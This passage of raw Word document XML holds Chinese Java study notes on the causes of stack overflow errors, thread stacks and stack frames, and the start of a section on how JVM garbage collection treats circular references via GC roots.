    <w:p w:rsidR="001B439C" w:rsidRPr="00FE7D76" w:rsidRDefault="001B439C" w:rsidP="001B439C"/>
    <w:p w:rsidR="001E0136" w:rsidRPr="00F41A4C" w:rsidRDefault="00C346A7" w:rsidP="00A876CC">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="001E0136">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidR="001E0136">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001E0136">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001E0136">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>栈溢出</w:t>
      </w:r>
      <w:r w:rsidR="003223C0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>原因</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E0136" w:rsidRDefault="00F876ED" w:rsidP="00F876ED">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">1.2.6.1 </w:t>
      </w:r>
      <w:r w:rsidR="00B176C5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>栈溢出原因</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E0136" w:rsidRDefault="001E0136" w:rsidP="003223C0">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="180" w:afterAutospacing="0" w:line="341" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>一）、是否有递归调用</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E0136" w:rsidRDefault="001E0136" w:rsidP="001E0136">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="180" w:afterAutospacing="0" w:line="341" w:lineRule="atLeast"/>
        <w:ind w:firstLine="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>二）、是否有大量循环或死循环</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E0136" w:rsidRDefault="001E0136" w:rsidP="001E0136">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="180" w:afterAutospacing="0" w:line="341" w:lineRule="atLeast"/>
        <w:ind w:firstLine="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>三）、全局变量是否过多</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E0136" w:rsidRDefault="001E0136" w:rsidP="001E0136">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="180" w:afterAutospacing="0" w:line="341" w:lineRule="atLeast"/>
        <w:ind w:firstLine="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>四）、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>数组、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>List</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>map</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>数据是否过大</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E0136" w:rsidRDefault="001E0136" w:rsidP="00BC44ED">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="180" w:afterAutospacing="0" w:line="341" w:lineRule="atLeast"/>
        <w:ind w:firstLine="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>五）使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DDMS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>工具进行查找大概出现栈溢出的位置</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F876ED" w:rsidRPr="001E0136" w:rsidRDefault="00F876ED" w:rsidP="00F876ED">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E9716E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>http://www.tuicool.com/articles/EJJ7re</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00087FE4" w:rsidRDefault="00087FE4" w:rsidP="00087FE4">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">1.2.6.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>栈与栈帧</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00297B03" w:rsidRDefault="00297B03" w:rsidP="00BC44ED">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="180" w:afterAutospacing="0" w:line="341" w:lineRule="atLeast"/>
        <w:ind w:firstLine="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00297B03">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>每个线程包含一个栈，栈里面存放的内容主要是栈帧</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>，栈帧保存着当前函数的</w:t>
      </w:r>
      <w:r w:rsidRPr="00297B03">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>局部变量表、操作数栈、帧数据区</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F876ED" w:rsidRPr="00F876ED" w:rsidRDefault="00297B03" w:rsidP="00BC44ED">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="180" w:afterAutospacing="0" w:line="341" w:lineRule="atLeast"/>
        <w:ind w:firstLine="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00297B03">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>局部变量</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>表保存函数的参数和局部变量，当前函数调用结束之后，栈帧被销毁之后，局部变量表也会销毁</w:t>
      </w:r>
      <w:r w:rsidR="0064492B">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F6F27" w:rsidRDefault="00E24FC9" w:rsidP="00BC44ED">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="180" w:afterAutospacing="0" w:line="341" w:lineRule="atLeast"/>
        <w:ind w:firstLine="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica" w:hint="eastAsia"/>
          <w:noProof/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4703377" cy="3247949"/>
            <wp:effectExtent l="19050" t="0" r="1973" b="0"/>
            <wp:docPr id="23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cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4707632" cy="3250887"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F6F27" w:rsidRDefault="00595C83" w:rsidP="00595C83">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="180" w:afterAutospacing="0" w:line="341" w:lineRule="atLeast"/>
        <w:ind w:firstLine="240"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica" w:hint="eastAsia"/>
          <w:noProof/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4209136" cy="3362412"/>
            <wp:effectExtent l="19050" t="0" r="914" b="0"/>
            <wp:docPr id="24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9" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4211111" cy="3363990"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F6F27" w:rsidRDefault="001752AF" w:rsidP="001752AF">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="180" w:afterAutospacing="0" w:line="341" w:lineRule="atLeast"/>
        <w:ind w:firstLine="240"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:noProof/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4179730" cy="2889504"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="24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0" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4181093" cy="2890446"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="001947C4" w:rsidRDefault="001947C4" w:rsidP="001752AF">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="180" w:afterAutospacing="0" w:line="341" w:lineRule="atLeast"/>
        <w:ind w:firstLine="240"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:noProof/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="2805493"/>
            <wp:effectExtent l="19050" t="0" r="2540" b="0"/>
            <wp:docPr id="24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cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="2805493"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00314BA9" w:rsidRPr="00BC44ED" w:rsidRDefault="00314BA9" w:rsidP="001752AF">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="180" w:afterAutospacing="0" w:line="341" w:lineRule="atLeast"/>
        <w:ind w:firstLine="240"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:noProof/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="1452731"/>
            <wp:effectExtent l="19050" t="0" r="2540" b="0"/>
            <wp:docPr id="24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2" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="1452731"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A16894" w:rsidRPr="00F41A4C" w:rsidRDefault="00BC44ED" w:rsidP="00A16894">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>1.2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidR="00A16894" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="00821FB9" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>JVM</w:t>
      </w:r>
      <w:r w:rsidR="00821FB9" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>如何处理循环引用</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A16894" w:rsidRPr="00F41A4C" w:rsidRDefault="001322BE" w:rsidP="001322BE">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>常说的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>GC(Garbage Collector) roots</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，特指的是垃圾收集器（</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Garbage Collector</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>）的对象，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>GC</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>会收集那些不是</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>GC roots</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>且没有被</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>GC roots</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>引用的对象。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E31AF" w:rsidRPr="00F41A4C" w:rsidRDefault="004E31AF" w:rsidP="007F3FAA">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="E5E7E7"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="75" w:afterAutospacing="0" w:line="315" w:lineRule="atLeast"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="464646"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="464646"/>
          <w:sz w:val="21"/>
